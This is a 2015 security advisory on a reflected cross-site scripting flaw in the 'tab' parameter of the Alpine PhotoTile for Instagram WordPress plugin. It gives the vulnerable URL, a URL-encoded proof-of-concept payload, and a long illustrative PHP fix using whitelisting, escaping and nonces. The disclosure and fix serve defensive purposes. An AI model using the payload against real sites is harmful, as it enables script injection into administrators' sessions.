Subject: Cross-Site Scripting (XSS) in Alpine PhotoTile for Instagram 1.2.7.5
Date: Thu, 20 Aug 2015 11:55:29 +0200

Hello,

Plugin: Alpine PhotoTile for Instagram 1.2.7.5 https://wordpress.org/plugins/alpine-photo-tile-for-instagram/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject HTML/JS code via the `tab` parameter, which is reflected unescaped into the settings page (the page also has no CSRF protection).

Url: http://localhost/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=[xss]
Method: GET
Vulnerable parameter: tab

Example PHP callstack:
PhotoTileForInstagramAdmin::admin_build_settings_page   [/alpine-photo-tile-for-instagram/gears/alpinebot-admin.php:793]

Verification:
http://localhost/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
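For readers assessing the fix, the following is an added illustration of how a WordPress settings page should handle a `tab` parameter so that the reflected value can never reach the output, and how a nonce supplies the missing CSRF protection. It is not the plugin's own code: the tab names and every `example_`-prefixed function are hypothetical; the WordPress API calls (`sanitize_key`, `esc_attr`, `esc_url`, `add_query_arg`, `check_admin_referer`, `wp_nonce_field`) are the real ones.

```php
<?php
// Added example, not code from the Alpine PhotoTile plugin.
// Tab names and example_* functions are hypothetical.

// The only tab values the page is ever allowed to render.
const EXAMPLE_ALLOWED_TABS = array( 'general', 'display', 'advanced' );

/**
 * Resolve the requested tab to a whitelisted value.
 * Anything outside the whitelist falls back to the default tab, so an
 * attacker-controlled string never becomes part of the output at all.
 */
function example_current_tab() {
    $requested = isset( $_GET['tab'] )
        ? sanitize_key( wp_unslash( $_GET['tab'] ) )
        : 'general';
    return in_array( $requested, EXAMPLE_ALLOWED_TABS, true ) ? $requested : 'general';
}

/**
 * Render the tab navigation. The values are already whitelisted, but
 * every string placed into markup is still escaped for its context
 * (attribute, URL, text) so a later change to the whitelist cannot
 * silently reintroduce the injection.
 */
function example_render_tabs( $tab ) {
    $base = admin_url( 'options-general.php?page=alpine-photo-tile-for-instagram-settings' );
    echo '<h2 class="nav-tab-wrapper">';
    foreach ( EXAMPLE_ALLOWED_TABS as $name ) {
        $url    = add_query_arg( 'tab', $name, $base );
        $active = ( $name === $tab ) ? ' nav-tab-active' : '';
        printf(
            '<a class="nav-tab%s" href="%s">%s</a>',
            esc_attr( $active ),
            esc_url( $url ),
            esc_html( ucfirst( $name ) )
        );
    }
    echo '</h2>';
}

/**
 * Settings-save handler. The capability check limits who may change
 * options; the nonce check ties each change to a form the administrator
 * actually submitted, which is the CSRF protection the advisory notes
 * is absent. check_admin_referer() stops execution on a bad nonce.
 */
function example_handle_settings_save() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    check_admin_referer( 'example_settings_save', 'example_nonce' );

    // Hypothetical option: coerce to a non-negative integer before storing.
    $count = isset( $_POST['example_count'] ) ? absint( $_POST['example_count'] ) : 0;
    update_option( 'example_photo_tile_count', $count );
}

/** Page callback registered with add_options_page() (registration omitted). */
function example_settings_page() {
    $tab = example_current_tab();
    example_render_tabs( $tab );

    echo '<form method="post">';
    wp_nonce_field( 'example_settings_save', 'example_nonce' );
    printf(
        '<label>Tiles to show <input type="number" name="example_count" value="%s"></label>',
        esc_attr( get_option( 'example_photo_tile_count', 0 ) )
    );
    submit_button();
    echo '</form>';
}
```

The two controls are independent and both are needed: the whitelist plus output escaping removes the reflected XSS regardless of who triggers the request, while the nonce prevents a third party from driving an authenticated administrator's browser through the settings form.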

--
Regards,
Marcin Probola,